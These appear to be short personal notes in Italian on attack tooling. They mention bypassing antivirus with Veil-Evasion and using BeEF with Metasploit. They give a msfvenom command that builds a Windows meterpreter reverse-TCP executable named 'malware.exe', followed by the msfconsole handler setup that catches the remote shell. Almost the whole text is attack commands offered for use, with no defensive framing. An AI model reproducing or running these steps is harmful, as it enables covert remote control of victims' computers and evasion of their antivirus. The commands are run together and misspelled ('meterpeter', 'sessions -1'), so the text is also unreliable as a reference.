baypassare antivirus
utilizzare Veil-evasion
beef + metasploit
se nella stessa rete, link video
usando msfvenom e meterpeter
- create reverse shell:
msfvenom -p windows/x64/meterpeter/reverse_tcp LHOST=IP_RICEVENTE LPORT=_PORTA_RICEVENTE -f exe > malware.exe- questo file viene eseguito su windows; assicurarsi che antivirus disattivato
- Su PC in ascolto:
msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpeter/reverse_tcpset lhost IP_RICEVENTEset LPORT PORTA_RICEVENTEset exitonsession falseexploit -jlancia il listener in background- Lanciare il file exe su win
sessions -1 PID_SESSIONEper entrare nella shell meterpeter